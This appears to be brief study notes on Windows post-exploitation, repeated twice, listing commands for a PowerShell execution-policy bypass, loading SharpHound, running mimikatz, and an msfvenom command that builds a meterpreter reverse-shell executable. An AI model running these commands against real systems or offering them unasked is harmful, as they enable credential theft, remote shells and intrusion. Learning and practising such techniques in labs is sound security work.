Post-Exploitation Basics
powershell -ep bypass |
. .\SharpHound.ps1 |
.\mimikatz.exe |
Event Viewer 查看事件日志
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 -f exe -o shell.exe |
powershell -ep bypass |
. .\SharpHound.ps1 |
.\mimikatz.exe |
Event Viewer 查看事件日志
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 -f exe -o shell.exe |